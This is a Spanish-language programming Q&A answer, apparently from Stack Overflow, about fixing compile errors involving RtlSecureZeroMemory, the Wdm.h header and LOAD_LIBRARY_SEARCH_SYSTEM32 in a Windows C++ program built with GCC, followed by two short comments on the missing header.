De acuerdo con la [documentación](https://msdn.microsoft.com/en-us/library/windows/hardware/ff562768(v=vs.85).aspx) de la msdn, la función `RtlSecureZeroMemory()` requiere el uso de la cabecera `Wdm.h`:

```
#include <Wdm.h>
```

El error relacionado con `LOAD_LIBRARY_SEARCH_SYSTEM32` puede ser un poco más complejo porque es dependiente del SO, siempre de acuerdo a la [documentación](https://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx) de la msdn.

Aparte de lo comentado, la función `main` debería devolver un entero:

```
int main()
{
  // ...
  return EXIT_SUCCESS; // Constante definida en stdlib.h
}
```

Comment: No se porqué cuando añado esta libreria me da : ||=== Build: Debug in book (compiler: GNU GCC Compiler) ===|
book\main.cpp|21|fatal error: Wdm.h: No such file or directory|

Comment: @Perl Ignoro la versión de Windows sobre la que estás trabajando... esta función no está disponible para versiones anteriores a la 2003. Por otro lado es posible que GCC no haya incorporado dicha función a la API de Windows que te ofrece